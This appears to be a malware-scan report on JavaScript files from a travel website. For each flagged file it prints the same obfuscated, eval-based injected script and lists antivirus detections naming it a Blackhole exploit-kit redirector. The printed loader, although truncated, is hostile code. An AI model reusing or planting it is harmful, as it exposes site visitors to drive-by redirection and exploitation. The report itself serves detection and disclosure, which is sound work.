z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/plugins.js | 200 OK Content-Length: 4877 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/number_slideshow.js | 200 OK Content-Length: 8860 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|
http://incredible-vacations.com/rajasthan-tours/../north-india-tours/../js/crawler.js | 200 OK Content-Length: 14448 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below):
z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="_";}z="2d_73_82_7b_70_81_76_7c_7b_2d_83_75_7a_3d_46_35_36_2d_88_1a_17_2d_83_6e_7f_2d_80_81_6e_81_76_70_4a_34_6e_77_6e_85_34_48_1a_17_2d_83_6e_7f_2d_70_7c_7b_81_7f_7c_79_79_72_7f_4a_34_76_7b_71_72_85_3b_7d_75_7d_34_48_1a_
... 3495 bytes are skipped ...81_7f_76_7b_74_35_2d_79_72_7b_39_2d_72_7b_71_2d_36_2d_36_48_1a_17_8a_1a_17_76_73_2d_35_7b_6e_83_76_74_6e_81_7c_7f_3b_70_7c_7c_78_76_72_52_7b_6e_6f_79_72_71_36_1a_17_88_1a_17_76_73_35_54_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_36_4a_4a_42_42_36_88_8a_72_79_80_72_88_60_72_81_50_7c_7c_78_76_72_35_34_83_76_80_76_81_72_71_6c_82_7e_34_39_2d_34_42_42_34_39_2d_34_3e_34_39_2d_34_3c_34_36_48_1a_17_1a_17_83_75_7a_3d_46_35_36_48_1a_17_8a_1a_17_8a"[ps](a2);za="";aa("arCode");e(""+za);}
Antivirus reports:
- AntiVir: JS/Blacole.DQ.1
- Avast: JS:Decode-BKS [Trj]
- Ikarus: Virus.JS.Exploit
- nProtect: JS:Exploit.BlackHole.BH
- TrendMicro-HouseCall: TROJ_GEN.F47V0829
- Comodo: Exploit.JS.Blacole.EH
- McAfee-GW-Edition: JS/Exploit-Blacole.gc
- DrWeb: Exploit.BlackHole.197
- Kaspersky: Trojan.JS.Redirector.zu
- Microsoft: Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan: JS:Exploit.BlackHole.BH
- Fortinet: JS/Kryptik.HOL!tr
- McAfee: JS/Exploit-Blacole.gc
- NANO-Antivirus: Trojan.Script.Expack.chwlwn
- F-Secure: JS:Exploit.BlackHole.BH
- AVG: JS/Exploit
- Norman: Blacole.VZ
- GData: JS:Exploit.BlackHole.BH
- Commtouch: Trojan.ZHEK-0
- BitDefender: JS:Exploit.BlackHole.BH
|